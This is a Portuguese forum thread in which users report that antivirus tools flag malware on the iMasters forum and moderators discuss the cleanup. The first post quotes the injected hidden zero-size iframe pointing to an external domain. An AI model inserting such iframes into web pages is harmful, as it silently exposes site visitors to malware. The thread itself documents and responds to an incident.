[Resolvido] Anti-virus Kaspersky detecta virus no fórum do imaste

[Quelipe 15]

Criei um tópico em "outros" http://forum.imasters.com.br/topic/431406-kaspersky-detecta-virus-no-imaster/page__pid__1702921#entry1702921

Mas acho que o lugar correto é aqui.

Dê uma atenção a isso:

 

Estou criando esse post pois uso o ANTI-VIRUS KASPERSKY e está acusando um vírus nas páginas dos fóruns do imaster, o código malicioso o qual está acusando é esse:

 

<IFraME src="http://fetvidsonline.com/count.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></IFraME>>

 

Ele está localizado no final da página após o fechamento do HTML;

 

At+

[brunobispo 20]

Também está acontecendo aqui.

[Elektra 102]

Idem.

 

 

 

 

 

 

Também não é possível inserir imagem pela tag 'img' do fórum, estou usando direto o endereço fornecido pelo imageshack.us.

[Motta 645]

Rebebi um aviso também do Symantec.

[Bruno Augusto 417]

Será que é só o Panda Cloud que não abriu o bico?

 

[EDIT]

 

Não sei se tem a ver, mas toda vez que tento fechar alguma aba do iMasters, do FF, ele trava todo e pede pra reiniciar.

 

De repente...

[Edvan 30]

Idem 2 :o

 

[0cool 0]

o fórum esta bugadão rsrsrs, aqui ta dando erro de java que simplesmente trava o navegador as vezes, e esta ocorrendo somente nesse fórum, quando entro em outros sites, fico por vários minutos e não acontece o mesmo erro.

[Jackson Dias 68]

 

 

Não sei se tem a ver, mas toda vez que tento fechar alguma aba do iMasters, do FF, ele trava todo e pede pra reiniciar.

 

De repente...

 

 

Mesma situação aqui.

[André Severino 3]

Eles sempre deixam um rasto, recentemente aconteceu isso comigo também, foi inserido um vírus no meu website do NADA. Até abri um tópico aqui mas ninguém me respondeu, perceba no final do rodapé o rastro deles

 

>

 

http://img838.imageshack.us/i/imgmgo.jpg/

[0cool 0]

Eu não chamaria de rastro, eu chamaria de burrice, já que trata-se de um erro de code no html.

 

E nesse caso não existe certeza de que se trata de um vírus, é estranho, devido aos relatos e erros corriqueiros, mais ainda não há como afirmar, também chega a ser preocupante, e se for, o lammer invadiu o IPB para colocar o code do iframe e ele teria que ter acesso ao admcp do ipb o que me deixa preocupado já que abriria várias possibilidades.

 

Mas é apenas suposição, esperemos para ver o que os administradores teem a dizer a respeito.

 

O engraçado mesmo é que olhando o code html da index do fórum se vê que ele tem muitos erros, nem fechamento da tag html </html> existe rsrsrsr e por ser um fórum focado para a área da programação esse tipo de coisa é inaceitável, pois deveria servir como exemplo.

[Elektra 102]

Considerando o horário que o tópico foi criado >> 17:48

 

é difícil compreender a ausência de algum responsável ao menos para notificar o suporte do fórum

 

e dar um retorno aos colaboradores.

 

 

 

:huh:

[João Batista Neto 448]

é difícil compreender a ausência de algum responsável ao menos para notificar o suporte do fórum

 

e dar um retorno aos colaboradores.

 

Vou ajudá-la a compreender, Elektra:

 

1. Nem todos possuem acesso ao FTP.

2. Nem todos os que possuem acesso, conhecem a linguagem em que o fórum é escrito.

3. Nem todos estão online 100% do tempo no fórum.

4. O sistema do fórum iMasters possui, com todas as modificações feitas, porém contanto apenas os arquivos PHP e JS:

 

3565 arquivos com um total de 1074589 linhas de código.

 

5. Um ataque desse pode utilizar-se de várias variações para que seja difícil ser localizado, entre elas, eval com base64.

6. Pode estar em qualquer lugar, em vários lugares ou fragmentado em várias partes.

 

Agora pergunto a você como desenvolvedora:

 

Quanto tempo você acha que levaria para localizar "sabe-se lá o que" em "sabe-se lá onde", com a única certeza de que o que você procura está localizado entre as 1074589 linhas de código de um sistema que não foi você quem escreveu ?

 

De qualquer forma, o problema já foi resolvido.

 

;)

[Quelipe 15]

João Batista Neto, passamos por algo semelhante aqui em nosso portal, porém descobrimos que não era ataque e sim os próprios reporters que injetavam "sem querer" o iframe malicioso, mas era no corpo das notícias, o que fizemos para solucionar, bloqueamos o ctrl+c e ctrl+v, pois a preguiça deles era tanta que copiavam uma notícia de uma agência ou outro site e a mesma já vinha com o código e como nosso portal permite HTML o iframe era executado. Mas no caso do fórum é complicado pois é diretamente no código.

 

At+

[João Batista Neto 448]

Mas no caso do fórum é complicado pois é diretamente no código.

 

De fato, Quelipe,

 

Mas nesse caso, foi uma injeção direta no código do sistema e quem lançou o ataque sabia exatamente o que estava fazendo.

 

Ainda essa semana vamos fazer uma varredura em todo o sistema em busca de possíveis brechas na segurança.

[- KbeçãO - 0]

Como outros, aqui tbm foi acusado o virus !

mas acho que ja foi solucionado !

 

Então foi uma tentativa de sabotar o fórum ?!?!?

[Giovani 104]

Sem esquecer que todos que estão aqui fazem o que fazem ("trabalham") sem receber nada.

Desde a menor até a maior tarefa todos dispendemos nosso tempo privado.

Tempo que poderiamos adiantar algo no trabalho, ficar com a família, curtir com amigos. Pensem nisso antes de reclamarem (principalmente madrugada adentro)!

 

Agora pergunto a você como desenvolvedora:

 

Quanto tempo você acha que levaria para localizar "sabe-se lá o que" em "sabe-se lá onde", com a única certeza de que o que você procura está localizado entre as 1074589 linhas de código de um sistema que não foi você quem escreveu ?

[Leozitho 81]

Aproveitando o tópico, fazem semanas que o outro fórum recém lançado, o iMasters Code, está fora do ar. Ele foi alvo de ataques também, está todo esse tempo em manutenção, ou foi descontinuado?

 

Eu achei a idéia do iMasters Code muito boa, um local onde todos podem compartilhar seus códigos, espero que não seja descontinuado.

[Giovani 104]

Leozitho, o Code também foi atacado, mas por lá foi mais complicado. Esperamos, não prometemos, que ele volte ainda essa semana.

[Leozitho 81]

Valeu pela informação Giovani.

[Bruno Augusto 417]

Ow, quer dizer que o "mini antivírus" (bem meia boca) que o IP.Board tem dentro dele sequer ficou amarelo, avisando que alguma coisa poderia estar errada com algum arquivo?